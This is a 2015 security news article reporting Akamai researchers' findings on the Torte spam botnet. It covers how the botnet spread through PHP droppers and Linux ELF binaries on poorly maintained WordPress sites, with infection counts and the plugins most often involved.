Botnet Leverages Vulnerable Sites

Thursday, November 5, 2015 @ 03:11 PM gHale

A new spam botnet called Torte infects machines via ELF Linux binaries and PHP scripts placed on the server’s filesystem.

The botnet is not the biggest ever discovered, but it is one of the largest in recent years, accounting for 83,000 infections across 2 of 4 infection layers, said researchers at Akamai SIRT (Security Intelligence Research Team).

CCTV Cameras Form Botnet
Takedown: Police Seize Botnet Servers
Botnet Protects Against Malware
Botnet Protects Against Malware

While ELF binary infections have only been on Linux machines, contaminated PHP scripts have been on all types of server operating systems, showing the attackers can target a broader scope of vulnerable systems.

SIRT researchers first became aware after getting a suspicious PHP script for analysis.

This script was the “dropper” part of the botnet, responsible for downloading and infecting the machine with more specialized tools.

Based on what type of operating system and hardware architecture it landed, the dropper would download specific files that could handle a series of tasks.

Most of them were identical, and using URLs hardcoded in the malicious files, the botnet’s slaves would download email templates, start dynamically assembling emails based on C&C instructions, and then send them out to victims.

For when PHP scripts ended up used to infect machines, Akamai researchers were able to narrow down the source of these infections to WordPress sites using poor configuration and plugin practices.

The bad configuration practices allowed researchers to use a fine-tuned Google search to find infected sites that in some cases logged their error messages to publicly accessible directories.

Some of the earlier infections attributed to the Torte botnet ended up recorded as of November 7, 2014 (via PHP scripts), and mid-August 2014 (for ELF binaries). Antivirus did not detect the ELF binaries as malware.

Akamai said 60 percent of all active infections resided in WordPress sites. Joomla accounted only for 4 percent.

Infection paths linked back to WordPress plugin and theme files. Akamai detected 2,615 individual plugins across 16,374 domains, and 3,055 unique themes across 9,481 domains.

By double-checking their list of detected plugins and themes against the list of vulnerable plugins and themes hosted by, Akamai was able to see that 70 percent of the plugins and 24 percent of the themes found ended up reported as vulnerable in the past.

The biggest victim was the Jetpack plugin from Automattic, the same company that makes WordPress. Akamai reported on finding 1,768 sites with the infection linked back to the Jetpack plugin.

There were 59 versions of this plugin running on infected sites, and despite some of them being up to date, 76 percent were still lagging behind when it came to updates.

Users who clicked on links inside the spam received from the botnet would end up directed to pages with hosted ads. Akamai said these landing pages also could be on other, previously compromised servers.

The Akamai report comes with two shell scripts to help webmasters identify and clean out infected servers.